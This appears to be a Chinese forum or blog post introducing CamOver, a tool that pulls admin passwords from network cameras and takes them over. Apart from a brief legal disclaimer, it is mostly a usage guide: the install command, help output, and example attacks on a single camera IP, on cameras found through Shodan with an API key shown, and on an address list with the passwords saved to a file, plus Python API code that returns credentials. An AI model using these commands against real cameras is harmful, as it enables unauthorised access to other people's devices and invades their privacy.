声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 关于 CamOverCamOver 是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。 功能特性工具安装由于 CamOver 使用 Python3 开发,因此首先需要在本地设备上安装并配置好 Python3 环境。接下来,广大研究人员可以使用下列命令下载并安装 CamOver: - pip3 install git+https://github.com/EntySec/CamOver
复制代码[color=var(--text-highlight-color)]基础使用 CamOver 的使用非常简单,我们只需要在命令行终端中输入 camover 命令即可使用 CamOver: - BASH
- ┌──(root????kali)-[~]
- └─# camover -h
- usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
- CamOver is a camera exploitation tool that allows to disclosure network camera admin password.
- optional arguments:
- -h, --help show this help message and exit
- -t, --threads Use threads for fastest work.
- -o OUTPUT, --output OUTPUT
- Output result to file.
- -i INPUT, --input INPUT
- Input file of addresses.
- -a ADDRESS, --address ADDRESS
- Single address.
- --shodan SHODAN Shodan API key for exploiting devices over Internet.
- --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
- -p PAGES, --pages PAGES
- Number of pages you want to get from ZoomEye.
复制代码 工具使用样例攻击单个摄像头下列命令可以攻击单个网络摄像头: - camover -a 79.xxx.xxx.237:1400
复制代码  
通过网络攻击远程摄像头
接下来,我们可以使用 Shodan 搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用 -t 参数来设置多线程数量以获得更好的性能: - camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
复制代码  
随便挑一个访问:  
从输入文件获取目标摄像头
我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用 -t 参数来设置多线程数量以获得更好的性能: - camover -t -i cameras.txt -o passwords.txt
复制代码
此命令将会攻击 cameras.txt 中给出的所有摄像头,并会将所有获取到的密码存储至 passwords.txt 文件中。 API 使用CamOver 还提供了自己的 Python API,可以将其导入至你们自己的项目代码中并调用其功能: - from camover import CamOver
复制代码 调用样例攻击单个摄像头: - PYTHON
- from camover import CamOver
- camover = CamOver()
- creds = camover.exploit('79.xxx.xxx.237:1400')
- print(creds)
- # 输出: ('admin', 'gzmudzka')
复制代码
|